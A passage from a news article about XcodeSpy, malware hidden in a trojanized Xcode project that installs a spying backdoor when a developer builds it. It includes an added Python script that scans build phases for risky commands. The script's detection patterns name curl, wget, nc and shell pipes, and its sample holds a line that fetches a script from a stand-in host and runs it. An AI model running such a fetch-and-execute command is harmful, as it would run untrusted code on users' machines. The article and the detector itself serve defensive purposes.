New Malware Hidden in Apple IDE Targets macOS Developers

XcodeSpy is latest example of growing attacks on software supply chain.

Researchers from SentinelOne have discovered new malware targeting developers of macOS apps in the latest sign of growing attacker interest in the software supply chain.


The malware, XcodeSpy, is disguised as a legitimate Xcode open source project called TabBarInteraction that provides macOS developers with code for animating the iOS Tab Bar based on user interaction.


"Xcode is an Integrated Development Environment [IDE] provided by Apple for developers to create software applications for all of Apple's platforms," says Philip Stokes, threat researcher at SentinelOne.


It is free to download and use and is chiefly used by developers to create apps for iPhone, iPad, and the Mac, he says.


XcodeSpy installs a variant of the EggShell backdoor on an Apple developer's macOS system. The backdoor is designed to spy on the developer and has features for recording the victim's camera, microphone, and keyboard activity. It also has the ability to download and upload files and to remain persistent on an infected system.


The malware is executed when a developer using the Trojanized version of the TabBarInteraction Xcode project launches what is known as the build target in Xcode. The XcodeSpy malware contacts the attacker's command-and-control (C2) server and drops the EggShell backdoor on the development machine, SentinelOne said in a report this week.


"An Xcode project is a repository for all the files, resources, and information required to build one or more software products," Stokes says. "A project contains all the elements used to build a product and maintain the relationships between those elements."
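Because the malware described above runs when the build target is launched, a cloned project can be reviewed for build-time scripts before it is ever built. The following is an added example, not code from the article or from SentinelOne: it assumes the build-time code sits in a Run Script build phase (a `PBXShellScriptBuildPhase` entry in `project.pbxproj`), and the review hints and the sample project fragment are constructed for illustration.

```python
import re
import sys

# One PBXShellScriptBuildPhase object, up to its closing "};"
PHASE_RE = re.compile(r'isa = PBXShellScriptBuildPhase;(.*?)\n\s*\};', re.S)
SCRIPT_RE = re.compile(r'shellScript = "((?:[^"\\]|\\.)*)";', re.S)
NAME_RE = re.compile(r'\bname = "?([^";]+)"?;')

# Review hints chosen for this example (assumptions, not indicators from the report).
HINTS = {
    "network fetch": r'\b(curl|wget|nc)\b|/dev/tcp/',
    "decoding or eval": r'\b(base64|xxd|rev|eval)\b',
    "pipes into a shell": r'\|\s*(ba|z)?sh\b',
}

def unescape(s):
    """Undo pbxproj backslash escapes so the script reads as it will run."""
    return re.sub(r'\\(.)', lambda m: {'n': '\n', 't': '\t'}.get(m[1], m[1]), s)

def audit(pbxproj_text):
    """Return every Run Script phase with its script body and matched hints."""
    phases = []
    for body in PHASE_RE.findall(pbxproj_text):
        script = SCRIPT_RE.search(body)
        name = NAME_RE.search(body)
        text = unescape(script[1]) if script else ""
        hits = [label for label, rx in HINTS.items() if re.search(rx, text)]
        phases.append({"name": name[1] if name else "(unnamed)",
                       "script": text, "hints": hits})
    return phases

# Constructed sample: two build phases as they appear in project.pbxproj.
SAMPLE = r'''
		AA01 /* Run SwiftLint */ = {
			isa = PBXShellScriptBuildPhase;
			name = "Run SwiftLint";
			shellScript = "if which swiftlint >/dev/null; then\n  swiftlint\nfi\n";
		};
		AA02 /* Run Script */ = {
			isa = PBXShellScriptBuildPhase;
			name = "Run Script";
			shellScript = "curl -s https://example.invalid/setup | sh\n";
		};
'''

if __name__ == "__main__":
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE
    for p in audit(text):
        print(f"[{', '.join(p['hints']) or 'no hints'}] {p['name']}\n{p['script']}")
```

Pass the path to a project's `project.pbxproj` as the first argument to audit a real checkout; every listed script deserves a read, and the hints only prioritise which to read first.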


Injecting malware into an Xcode project gives attackers a way ..
